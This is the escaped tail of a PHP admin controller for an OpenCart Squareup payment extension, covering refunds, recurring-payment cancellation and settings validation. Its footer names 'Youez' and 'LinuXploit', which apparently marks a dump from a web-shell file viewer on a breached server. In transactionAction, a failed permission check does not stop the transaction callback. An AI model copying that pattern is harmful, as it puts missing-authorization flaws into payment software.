
            $currency = $transaction_info[&#039;transaction_currency&#039;];
            $tenders = @json_decode($transaction_info[&#039;tenders&#039;], true);

            $updated_transaction = $this-&gt;squareup-&gt;refundTransaction($transaction_info[&#039;location_id&#039;], $transaction_info[&#039;transaction_id&#039;], $reason, $amount, $currency, $tenders[0][&#039;id&#039;]);

            $status = $updated_transaction[&#039;tenders&#039;][0][&#039;card_details&#039;][&#039;status&#039;];

            $refunds = array();

            if (!empty($updated_transaction[&#039;refunds&#039;])) {
                $refunds = $updated_transaction[&#039;refunds&#039;];
            }

            $this-&gt;model_extension_payment_squareup-&gt;updateTransaction($transaction_info[&#039;squareup_transaction_id&#039;], $status, $refunds);

            $last_refund = array_pop($refunds);

            if ($last_refund) {
                $refunded_amount = $this-&gt;currency-&gt;format(
                    $this-&gt;squareup-&gt;standardDenomination(
                        $last_refund[&#039;amount_money&#039;][&#039;amount&#039;], 
                        $last_refund[&#039;amount_money&#039;][&#039;currency&#039;]
                    ), 
                    $last_refund[&#039;amount_money&#039;][&#039;currency&#039;]
                );

                $comment = sprintf($this-&gt;language-&gt;get(&#039;text_refunded_amount&#039;), $refunded_amount, $last_refund[&#039;status&#039;], $last_refund[&#039;reason&#039;]);

                $json[&#039;order_history_data&#039;] = array(
                    &#039;notify&#039; =&gt; 1,
                    &#039;order_id&#039; =&gt; $transaction_info[&#039;order_id&#039;],
                    &#039;order_status_id&#039; =&gt; $this-&gt;model_extension_payment_squareup-&gt;getOrderStatusId($transaction_info[&#039;order_id&#039;]),
                    &#039;comment&#039; =&gt; $comment,
                );

                $json[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_success_refund&#039;);
            } else {
                $json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_no_refund&#039;);
            }
        });
    }

    public function order() {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        $data[&#039;url_list_transactions&#039;] = html_entity_decode($this-&gt;url-&gt;link(&#039;extension/payment/squareup/transactions&#039;, &#039;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;] . &#039;&amp;order_id=&#039; . $this-&gt;request-&gt;get[&#039;order_id&#039;] . &#039;&amp;page={PAGE}&#039;, true));
        $data[&#039;user_token&#039;] = $this-&gt;session-&gt;data[&#039;user_token&#039;];
        $data[&#039;order_id&#039;] = $this-&gt;request-&gt;get[&#039;order_id&#039;];

        $data[&#039;catalog&#039;] = $this-&gt;request-&gt;server[&#039;HTTPS&#039;] ? HTTPS_CATALOG : HTTP_CATALOG;

        // API login
        $this-&gt;load-&gt;model(&#039;user/api&#039;);

        $api_info = $this-&gt;model_user_api-&gt;getApi($this-&gt;config-&gt;get(&#039;config_api_id&#039;));

        if ($api_info &amp;&amp; $this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;sale/order&#039;)) {
            $session = new Session($this-&gt;config-&gt;get(&#039;session_engine&#039;), $this-&gt;registry);
            
            $session-&gt;start();
                    
            $this-&gt;model_user_api-&gt;deleteApiSessionBySessonId($session-&gt;getId());
            
            $this-&gt;model_user_api-&gt;addApiSession($api_info[&#039;api_id&#039;], $session-&gt;getId(), $this-&gt;request-&gt;server[&#039;REMOTE_ADDR&#039;]);
            
            $session-&gt;data[&#039;api_id&#039;] = $api_info[&#039;api_id&#039;];

            $data[&#039;api_token&#039;] = $session-&gt;getId();
        } else {
            $data[&#039;api_token&#039;] = &#039;&#039;;
        }

        return $this-&gt;load-&gt;view(&#039;extension/payment/squareup_order&#039;, $data);
    }

    public function install() {
        $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);
        
        $this-&gt;model_extension_payment_squareup-&gt;createTables();
    }

    public function uninstall() {
        $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);

        $this-&gt;model_extension_payment_squareup-&gt;dropTables();
    }

    public function recurringButtons() {
        if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;sale/recurring&#039;)) {
            return;
        }

        $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);

        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        if (isset($this-&gt;request-&gt;get[&#039;order_recurring_id&#039;])) {
            $order_recurring_id = $this-&gt;request-&gt;get[&#039;order_recurring_id&#039;];
        } else {
            $order_recurring_id = 0;
        }

        $recurring_info = $this-&gt;model_sale_recurring-&gt;getRecurring($order_recurring_id);

        $data[&#039;button_text&#039;] = $this-&gt;language-&gt;get(&#039;button_cancel_recurring&#039;);

        if ($recurring_info[&#039;status&#039;] == ModelExtensionPaymentSquareup::RECURRING_ACTIVE) {
            $data[&#039;order_recurring_id&#039;] = $order_recurring_id;
        } else {
            $data[&#039;order_recurring_id&#039;] = &#039;&#039;;
        }

        $this-&gt;load-&gt;model(&#039;sale/order&#039;);

        $order_info = $this-&gt;model_sale_order-&gt;getOrder($recurring_info[&#039;order_id&#039;]);

        $data[&#039;order_id&#039;] = $recurring_info[&#039;order_id&#039;];
        $data[&#039;store_id&#039;] = $order_info[&#039;store_id&#039;];
        $data[&#039;order_status_id&#039;] = $order_info[&#039;order_status_id&#039;];
        $data[&#039;comment&#039;] = $this-&gt;language-&gt;get(&#039;text_order_history_cancel&#039;);
        $data[&#039;notify&#039;] = 1;

        $data[&#039;catalog&#039;] = $this-&gt;request-&gt;server[&#039;HTTPS&#039;] ? HTTPS_CATALOG : HTTP_CATALOG;

        // API login
        $this-&gt;load-&gt;model(&#039;user/api&#039;);

        $api_info = $this-&gt;model_user_api-&gt;getApi($this-&gt;config-&gt;get(&#039;config_api_id&#039;));

        if ($api_info &amp;&amp; $this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;sale/order&#039;)) {
            $session = new Session($this-&gt;config-&gt;get(&#039;session_engine&#039;), $this-&gt;registry);
            
            $session-&gt;start();
                    
            $this-&gt;model_user_api-&gt;deleteApiSessionBySessonId($session-&gt;getId());
            
            $this-&gt;model_user_api-&gt;addApiSession($api_info[&#039;api_id&#039;], $session-&gt;getId(), $this-&gt;request-&gt;server[&#039;REMOTE_ADDR&#039;]);
            
            $session-&gt;data[&#039;api_id&#039;] = $api_info[&#039;api_id&#039;];

            $data[&#039;api_token&#039;] = $session-&gt;getId();
        } else {
            $data[&#039;api_token&#039;] = &#039;&#039;;
        }

        $data[&#039;cancel&#039;] = html_entity_decode($this-&gt;url-&gt;link(&#039;extension/payment/squareup/recurringCancel&#039;, &#039;order_recurring_id=&#039; . $order_recurring_id . &#039;&amp;user_token=&#039; . $this-&gt;session-&gt;data[&#039;user_token&#039;], true));

        return $this-&gt;load-&gt;view(&#039;extension/payment/squareup_recurring_buttons&#039;, $data);
    }

    public function recurringCancel() {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        $json = array();
        
        if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;sale/recurring&#039;)) {
            $json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_permission_recurring&#039;);
        } else {
            $this-&gt;load-&gt;model(&#039;sale/recurring&#039;);
            
            if (isset($this-&gt;request-&gt;get[&#039;order_recurring_id&#039;])) {
                $order_recurring_id = $this-&gt;request-&gt;get[&#039;order_recurring_id&#039;];
            } else {
                $order_recurring_id = 0;
            }
            
            $recurring_info = $this-&gt;model_sale_recurring-&gt;getRecurring($order_recurring_id);

            if ($recurring_info) {
                $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);

                $this-&gt;model_extension_payment_squareup-&gt;editOrderRecurringStatus($order_recurring_id, ModelExtensionPaymentSquareup::RECURRING_CANCELLED);

                $json[&#039;success&#039;] = $this-&gt;language-&gt;get(&#039;text_canceled_success&#039;);
                
            } else {
                $json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_not_found&#039;);
            }
        }

        $this-&gt;response-&gt;addHeader(&#039;Content-Type: application/json&#039;);
        $this-&gt;response-&gt;setOutput(json_encode($json));
    }

    protected function validate() {
        if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;extension/payment/squareup&#039;)) {
            $this-&gt;error[&#039;warning&#039;] = $this-&gt;language-&gt;get(&#039;error_permission&#039;);
        }

        if (empty($this-&gt;request-&gt;post[&#039;payment_squareup_client_id&#039;]) || strlen($this-&gt;request-&gt;post[&#039;payment_squareup_client_id&#039;]) &gt; 32) {
            $this-&gt;error[&#039;client_id&#039;] = $this-&gt;language-&gt;get(&#039;error_client_id&#039;);
        }

        if (empty($this-&gt;request-&gt;post[&#039;payment_squareup_client_secret&#039;]) || strlen($this-&gt;request-&gt;post[&#039;payment_squareup_client_secret&#039;]) &gt; 50) {
            $this-&gt;error[&#039;client_secret&#039;] = $this-&gt;language-&gt;get(&#039;error_client_secret&#039;);
        }

        if (!empty($this-&gt;request-&gt;post[&#039;payment_squareup_enable_sandbox&#039;])) {
            if (empty($this-&gt;request-&gt;post[&#039;payment_squareup_sandbox_client_id&#039;]) || strlen($this-&gt;request-&gt;post[&#039;payment_squareup_sandbox_client_id&#039;]) &gt; 42) {
                $this-&gt;error[&#039;sandbox_client_id&#039;] = $this-&gt;language-&gt;get(&#039;error_sandbox_client_id&#039;);
            }

            if (empty($this-&gt;request-&gt;post[&#039;payment_squareup_sandbox_token&#039;]) || strlen($this-&gt;request-&gt;post[&#039;payment_squareup_sandbox_token&#039;]) &gt; 42) {
                $this-&gt;error[&#039;sandbox_token&#039;] = $this-&gt;language-&gt;get(&#039;error_sandbox_token&#039;);
            }

            if ($this-&gt;config-&gt;get(&#039;payment_squareup_merchant_id&#039;) &amp;&amp; !$this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_locations&#039;)) {
                $this-&gt;error[&#039;warning&#039;] = $this-&gt;language-&gt;get(&#039;text_no_appropriate_locations_warning&#039;);
            }

            if ($this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_locations&#039;) &amp;&amp; isset($this-&gt;request-&gt;post[&#039;payment_squareup_sandbox_location_id&#039;]) &amp;&amp; !in_array($this-&gt;request-&gt;post[&#039;payment_squareup_sandbox_location_id&#039;], array_map(function($location) {
                return $location[&#039;id&#039;];
            }, $this-&gt;config-&gt;get(&#039;payment_squareup_sandbox_locations&#039;)))) {
                $this-&gt;error[&#039;location&#039;] = $this-&gt;language-&gt;get(&#039;error_no_location_selected&#039;);
            }
        } else {
            if ($this-&gt;config-&gt;get(&#039;payment_squareup_merchant_id&#039;) &amp;&amp; !$this-&gt;config-&gt;get(&#039;payment_squareup_locations&#039;)) {
                $this-&gt;error[&#039;warning&#039;] = $this-&gt;language-&gt;get(&#039;text_no_appropriate_locations_warning&#039;);
            }

            if ($this-&gt;config-&gt;get(&#039;payment_squareup_locations&#039;) &amp;&amp; isset($this-&gt;request-&gt;post[&#039;payment_squareup_location_id&#039;]) &amp;&amp; !in_array($this-&gt;request-&gt;post[&#039;payment_squareup_location_id&#039;], array_map(function($location) {
                return $location[&#039;id&#039;];
            }, $this-&gt;config-&gt;get(&#039;payment_squareup_locations&#039;)))) {
                $this-&gt;error[&#039;location&#039;] = $this-&gt;language-&gt;get(&#039;error_no_location_selected&#039;);
            }
        }

        if (!empty($this-&gt;request-&gt;post[&#039;payment_squareup_cron_email_status&#039;])) {
            if (!filter_var($this-&gt;request-&gt;post[&#039;payment_squareup_cron_email&#039;], FILTER_VALIDATE_EMAIL)) {
                $this-&gt;error[&#039;cron_email&#039;] = $this-&gt;language-&gt;get(&#039;error_invalid_email&#039;);
            }
        }

        if (!isset($this-&gt;request-&gt;get[&#039;save_and_auth&#039;]) &amp;&amp; empty($this-&gt;request-&gt;post[&#039;payment_squareup_cron_acknowledge&#039;])) {
            $this-&gt;error[&#039;cron_acknowledge&#039;] = $this-&gt;language-&gt;get(&#039;error_cron_acknowledge&#039;);
        }

        if ($this-&gt;error &amp;&amp; empty($this-&gt;error[&#039;warning&#039;])) {
            $this-&gt;error[&#039;warning&#039;] = $this-&gt;language-&gt;get(&#039;error_form&#039;);
        }

        return !$this-&gt;error;
    }

    protected function transactionAction($callback) {
        $this-&gt;load-&gt;language(&#039;extension/payment/squareup&#039;);

        $this-&gt;load-&gt;model(&#039;extension/payment/squareup&#039;);

        $this-&gt;load-&gt;library(&#039;squareup&#039;);

        $json = array();

        if (!$this-&gt;user-&gt;hasPermission(&#039;modify&#039;, &#039;extension/payment/squareup&#039;)) {
            $json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_permission&#039;);
        }

        if (isset($this-&gt;request-&gt;get[&#039;squareup_transaction_id&#039;])) {
            $squareup_transaction_id = $this-&gt;request-&gt;get[&#039;squareup_transaction_id&#039;];
        } else {
            $squareup_transaction_id = 0;
        }

        $transaction_info = $this-&gt;model_extension_payment_squareup-&gt;getTransaction($squareup_transaction_id);

        if (empty($transaction_info)) {
            $json[&#039;error&#039;] = $this-&gt;language-&gt;get(&#039;error_transaction_missing&#039;);
        } else {
            try {
                $callback($transaction_info, $json);
            } catch (\Squareup\Exception $e) {
                $json[&#039;error&#039;] = $e-&gt;getMessage();
            }
        }

        if (isset($this-&gt;request-&gt;get[&#039;preserve_alert&#039;])) {
            if (!empty($json[&#039;error&#039;])) {
                $this-&gt;pushAlert(array(
                    &#039;type&#039; =&gt; &#039;danger&#039;,
                    &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                    &#039;text&#039; =&gt; $json[&#039;error&#039;]
                ));
            }

            if (!empty($json[&#039;success&#039;])) {
                $this-&gt;pushAlert(array(
                    &#039;type&#039; =&gt; &#039;success&#039;,
                    &#039;icon&#039; =&gt; &#039;exclamation-circle&#039;,
                    &#039;text&#039; =&gt; $json[&#039;success&#039;]
                ));
            }
        }

        $this-&gt;response-&gt;addHeader(&#039;Content-Type: application/json&#039;);
        $this-&gt;response-&gt;setOutput(json_encode($json));
    }

    protected function pushAlert($alert) {
        $this-&gt;session-&gt;data[&#039;payment_squareup_alerts&#039;][] = $alert;
    }

    protected function pullAlerts() {
        if (isset($this-&gt;session-&gt;data[&#039;payment_squareup_alerts&#039;])) {
            return $this-&gt;session-&gt;data[&#039;payment_squareup_alerts&#039;];
        } else {
            return array();
        }
    }

    protected function clearAlerts() {
        unset($this-&gt;session-&gt;data[&#039;payment_squareup_alerts&#039;]);
    }

    protected function getSettingValue($key, $default = null, $checkbox = false) {
        if ($checkbox) {
            if ($this-&gt;request-&gt;server[&#039;REQUEST_METHOD&#039;] == &#039;POST&#039; &amp;&amp; !isset($this-&gt;request-&gt;post[$key])) {
                return $default;
            } else {
                return $this-&gt;config-&gt;get($key);
            }
        }

        if (isset($this-&gt;request-&gt;post[$key])) {
            return $this-&gt;request-&gt;post[$key]; 
        } else if ($this-&gt;config-&gt;has($key)) {
            return $this-&gt;config-&gt;get($key);
        } else {
            return $default;
        }
    }

    protected function getValidationError($key) {
        if (isset($this-&gt;error[$key])) {
            return $this-&gt;error[$key];
        } else {
            return &#039;&#039;;
        }
    }
}</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>